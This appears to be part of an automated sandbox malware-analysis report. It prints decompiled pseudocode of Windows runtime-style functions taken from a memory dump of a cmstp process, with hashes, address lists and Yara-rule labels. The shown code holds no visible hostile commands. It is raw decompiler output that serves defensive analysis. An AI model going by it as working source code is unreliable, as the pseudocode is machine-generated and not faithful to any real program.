Instruction Fuzzy Hash: E731423A6146019FDB11DF58D4C1BAEBBB4FF28325F050079ED05EB281EBB9C9468B80

Uniqueness

Uniqueness Score: -1.00%

Function 0510F527 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0510F527(void* __ecx, void* __edx, signed int* _a4) {
				char _v8;
				signed int _v12;
				void* __ebx;
				signed int _t28;
				signed int _t32;
				signed int _t34;
				signed char* _t37;
				intOrPtr _t38;
				intOrPtr* _t50;
				signed int _t53;
				void* _t69;

				_push(__ecx);
				_push(__ecx);
				_t69 = __ecx;
				_t53 =  *(__ecx + 0x10);
				_t50 = __ecx + 0x14;
				_t28 = _t53 + __edx;
				_v12 = _t28;
				if(_t28 >  *_t50) {
					_v8 = _t28 -  *_t50;
					_push(E05100678( *((intOrPtr*)(__ecx + 0xc)), 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push(_t50);
					_push(0xffffffff);
					_t32 = E05119660();
					__eflags = _t32;
					if(_t32 < 0) {
						 *_a4 =  *_a4 & 0x00000000;
						L2:
						return _t32;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1e8)) =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1e8)) + _v8;
					_t34 = E050F7D50();
					_t66 = 0x7ffe0380;
					__eflags = _t34;
					if(_t34 != 0) {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					} else {
						_t37 = 0x7ffe0380;
					}
					__eflags =  *_t37;
					if( *_t37 != 0) {
						_t38 =  *[fs:0x30];
						__eflags =  *(_t38 + 0x240) & 0x00000001;
						if(( *(_t38 + 0x240) & 0x00000001) == 0) {
							goto L7;
						}
						__eflags = E050F7D50();
						if(__eflags != 0) {
							_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E05191582(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, __eflags, _v8,  *( *((intOrPtr*)(_t69 + 0xc)) + 0x74) << 3,  *_t66 & 0x000000ff);
						E0519138A(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, _v8, 9);
						goto L7;
					} else {
						L7:
						 *_t50 =  *_t50 + _v8;
						_t53 =  *(_t69 + 0x10);
						goto L1;
					}
				}
				L1:
				 *_a4 = _t53;
				 *(_t69 + 0x10) = _v12;
				_t32 = 0;
				goto L2;
			}

0x0510f52c
0x0510f52d
0x0510f530
0x0510f533
0x0510f536
0x0510f539
0x0510f53c
0x0510f541
0x0510f561
0x0510f569
0x0510f56a
0x0510f572
0x0510f573
0x0510f575
0x0510f576
0x0510f578
0x0510f57d
0x0510f57f
0x0510f5b7
0x0510f550
0x0510f556
0x0510f556
0x0510f587
0x0510f58d
0x0510f592
0x0510f597
0x0510f599
0x0514bcc9
0x0510f59f
0x0510f59f
0x0510f59f
0x0510f5a1
0x0510f5a4
0x0514bcd3
0x0514bcd9
0x0514bce0
0x00000000
0x00000000
0x0514bceb
0x0514bced
0x0514bcf8
0x0514bcf8
0x0514bcf8
0x0514bd11
0x0514bd20
0x00000000
0x0510f5aa
0x0510f5aa
0x0510f5ad
0x0510f5af
0x00000000
0x0510f5af
0x0510f5a4
0x0510f543
0x0510f546
0x0510f54b
0x0510f54e
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1964674c32ee0b8d0769a9c26bb8bd53e50b50cf439c01f9c98bc06a8389b4f
Instruction ID: d6686a38912009c7c082d48bdaec4ad93a5268a6ff7ac429a31df734a1440c84
Opcode Fuzzy Hash: a1964674c32ee0b8d0769a9c26bb8bd53e50b50cf439c01f9c98bc06a8389b4f
Instruction Fuzzy Hash: C3319A31604648EFDB25CF68C888F6AB7B9FF44310F1405A9E815CB690EB70EE02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05101DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E05101DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E050FF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L050F4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E050FF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x05101dc2
0x05101dc5
0x05101dc7
0x05101dcc
0x05101dce
0x05101dd6
0x05101ddf
0x05101de0
0x05101de1
0x05101de5
0x05101de8
0x05101def
0x05101df0
0x05101df6
0x05101df7
0x05101dfe
0x05101e1a
0x00000000
0x00000000
0x05101e0b
0x05101e12
0x05101e12
0x05101e00
0x05101e00
0x05101e05
0x05101e1e
0x05101e23
0x0514570f
0x05145713
0x00000000
0x00000000
0x05145719
0x05145719
0x05101e2c
0x05101e2d
0x05101e2e
0x05101e2f
0x05101e31
0x05101e32
0x05101e35
0x05101e3d
0x05145723
0x0514573d
0x0514573d
0x00000000
0x05145723
0x05101e49
0x05101e4e
0x05101e4e
0x05101e09
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 56460f6f68fa4cada5351ac1d73a2416b1102e9440e08d4a6ae65fb58c28f543
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: FA218032640219BBC726CF59CC84EAFBBB9FF85740F115065F90197250D774AE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 050D9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E050D9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x51af6e8);
				E0512D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E051A88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0512D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x51c86c0; // 0x33a07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x51c86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E050F2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E051A88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0511AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x51cb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x51c84c0;
										if(_t69 >=  *0x51c84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E051A9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E050D922A(_t82);
							_t53 = E050F7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E051A8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x51c86c0; // 0x33a07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x51c86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x51c86bc;
										_t72 = 0x51c86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E050D9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x51c86c4;
									_t72 = 0x51c86c0;
									L18:
									E05109B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x050d9100
0x050d9100
0x050d9100
0x050d9100
0x050d9102
0x050d9107
0x050d910c
0x050d9110
0x050d9115
0x050d9136
0x050d9143
0x051337e4
0x051337e4
0x050d9149
0x050d914e
0x050d914e
0x050d9117
0x050d911d
0x00000000
0x00000000
0x050d911f
0x050d9125
0x00000000
0x050d9151
0x050d9158
0x050d915d
0x050d9161
0x050d9168
0x05133715
0x00000000
0x050d916e
0x050d916e
0x050d9175
0x050d9177
0x050d917e
0x050d917f
0x050d9182
0x050d9182
0x050d9187
0x050d9187
0x050d918a
0x050d918d
0x050d918f
0x050d9192
0x050d9195
0x050d9198
0x050d9198
0x050d9198
0x050d919a
0x00000000
0x00000000
0x0513371f
0x05133721
0x05133727
0x0513372f
0x05133733
0x05133735
0x05133738
0x0513373b
0x0513373d
0x05133740
0x00000000
0x00000000
0x05133746
0x05133749
0x00000000
0x00000000
0x0513374f
0x05133751
0x00000000
0x00000000
0x05133757
0x05133759
0x0513375c
0x0513375c
0x0513375e
0x0513375e
0x05133761
0x05133764
0x00000000
0x00000000
0x05133766
0x05133768
0x051337a3
0x051337a3
0x051337a5
0x051337a7
0x051337ad
0x051337b0
0x051337b2
0x051337bc
0x051337c2
0x051337c2
0x051337b2
0x050d9187
0x050d9187
0x050d918a
0x050d918d
0x050d918f
0x050d9192
0x050d9195
0x00000000
0x050d9195
0x00000000
0x050d9187
0x0513376a
0x0513376a
0x0513376c
0x0513376c
0x0513376f
0x05133775
0x00000000
0x00000000
0x05133777
0x05133779
0x00000000
0x00000000
0x05133782
0x05133787
0x05133789
0x05133790
0x05133790
0x0513378b
0x0513378b
0x0513378b
0x05133792
0x05133795
0x05133795
0x05133798
0x05133798
0x0513379b
0x0513379b
0x050d91a3
0x050d91a9
0x050d91b0
0x050d91b4
0x050d91b4
0x050d91bb
0x050d91c0
0x050d91c5
0x050d91c7
0x051337da
0x050d91cd
0x050d91cd
0x050d91cd
0x050d91d2
0x050d91d5
0x050d9239
0x050d9239
0x050d91d7
0x050d91db
0x050d91e1
0x050d91e7
0x050d91fd
0x050d9203
0x050d921e
0x050d9223
0x00000000
0x050d9223
0x050d9205
0x050d9208
0x050d920c
0x050d9214
0x050d9214
0x050d91e9
0x050d91e9
0x050d91ee
0x050d91f3
0x050d91f3
0x050d91f3
0x050d91e7
0x00000000
0x050d91db
0x050d9187
0x050d9168

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010f3efaf7352c22e0869fdae69fb4025975e27ad0943c32f80ebf582ac7ac0d
Instruction ID: f047cfbadd7daedc4e6d32682d56ab6264e8260dde8d40193ce03b8ed301fd53
Opcode Fuzzy Hash: 010f3efaf7352c22e0869fdae69fb4025975e27ad0943c32f80ebf582ac7ac0d
Instruction Fuzzy Hash: 1D31DE79A05385EFDB61DF68E488BACFFF2BB88310F1C8949C41567281C735A980CB61

Uniqueness

Uniqueness Score: -1.00%

Function 050F0050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E050F0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x51cd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E05109ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0511B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E051A8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E05109702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x51cb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x050f0055
0x050f005d
0x050f0062
0x050f006c
0x050f006f
0x050f0074
0x050f007a
0x050f007a
0x050f0080
0x050f0080
0x050f0087
0x050f008d
0x050f008f
0x050f0093
0x050f0095
0x050f009b
0x050f00f8
0x050f00fb
0x050f00fc
0x050f00ff
0x050f0108
0x050f0108
0x050f00a2
0x050f00a6
0x050f00b3
0x050f00bc
0x050f00c5
0x050f00ca
0x0513c01e
0x00000000
0x00000000
0x0513c02d
0x050f00d5
0x050f00d9
0x0513c03d
0x0513c046
0x0513c046
0x050f00df
0x050f00e2
0x050f00ea
0x050f00ef
0x050f00f2
0x050f00f6
0x050f0111
0x050f0117
0x050f0117
0x00000000
0x050f00f6
0x050f00d0
0x050f00d0
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49626789a5853aafa62472762bef2bf26540a0adb0d42be94eee848a77b2e202
Instruction ID: 692498d956391be2cb38fbdd73d3becfaf0e2aa8d5c05570abd461e098d7ee62
Opcode Fuzzy Hash: 49626789a5853aafa62472762bef2bf26540a0adb0d42be94eee848a77b2e202
Instruction Fuzzy Hash: 5931BD31201B04CFD721CF28D858BAAB7E6FF88714F14456DE59787A91EB75AC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05156C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05156C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E050F7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x51c7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L050F4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0511F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E050F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E05119AE0();
						_t23 = L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x05156c0a
0x05156c0f
0x05156c10
0x05156c13
0x05156c15
0x05156c19
0x05156c1c
0x05156c21
0x05156c28
0x05156c3a
0x05156c2a
0x05156c33
0x05156c33
0x05156c3f
0x05156c48
0x05156c4d
0x05156c60
0x05156c65
0x05156c69
0x05156c73
0x05156c79
0x05156c7f
0x05156c86
0x05156c90
0x05156c94
0x05156ca6
0x05156cb2
0x05156cbd
0x05156cbd
0x05156cc3
0x05156cc7
0x05156ccb
0x05156cd0
0x05156cd1
0x05156ce2
0x05156ce2
0x05156c69
0x05156ced

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a1893d3985e5114ae7f600eb94afda188e0fe79faee215f86a84bef136dc41
Instruction ID: 3cf3aa37076953ba577a93b05df87bcc562dcd0a50bd4892c09b34424328979e
Opcode Fuzzy Hash: a6a1893d3985e5114ae7f600eb94afda188e0fe79faee215f86a84bef136dc41
Instruction Fuzzy Hash: 30219A71A00644AFC715DB68D884E6AB7B8FF48710F1400A9F909C7B91D734ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 051190AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E051190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0512D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0510E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L050F4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0511F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0510A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x051190af
0x051190b8
0x051190bb
0x051190bf
0x051190c2
0x051190c2
0x051190c8
0x051190cb
0x051190cd
0x051514d7
0x051514eb
0x051514eb
0x00000000
0x051514eb
0x051514db
0x051514e6
0x00000000
0x051514f2
0x051514e8
0x00000000
0x051514e8
0x051190d8
0x051190da
0x051190dd
0x051190e5
0x00000000
0x05119139
0x051190fa
0x051190fe
0x05119142
0x00000000
0x05119142
0x05119104
0x05119107
0x0511910b
0x05119110
0x05119118
0x05119147
0x05119148
0x0511914f
0x05119150
0x05119151
0x05119152
0x05119156
0x0511915d
0x05119160
0x05119168
0x0511916c
0x051191bc
0x051191be
0x00000000
0x051191be
0x0511916e
0x05119173
0x05119176
0x00000000
0x00000000
0x0511917c
0x05119180
0x051191b5
0x00000000
0x051191b5
0x05119182
0x05119185
0x05119189
0x00000000
0x00000000
0x0511918e
0x05119190
0x05119198
0x00000000
0x00000000
0x051191a0
0x00000000
0x051191ad
0x051191ad
0x051191b0
0x051191b1
0x00000000
0x05119185
0x0511911a
0x0511911c
0x0511911f
0x05119125
0x05119127
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: eb9525c28ea37d17c1c94655640fedc0e7032ff40e0b2d91e29c102221df175f
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 7E218071A04204EFDB21DF59C844EAAF7F9EB44320F1588BAED99A7240D370ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05103B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E05103B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x51c84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x51c84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x51c84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0511AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0511FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x51c84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
